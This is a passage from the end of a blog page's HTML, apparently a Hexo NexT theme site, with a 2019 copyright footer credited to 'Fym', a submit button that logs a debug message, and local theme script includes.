  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Fym</span>
</div>
<button id="submit" onclick="console.log('点击了提交-详情页!!!')">提交</button>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
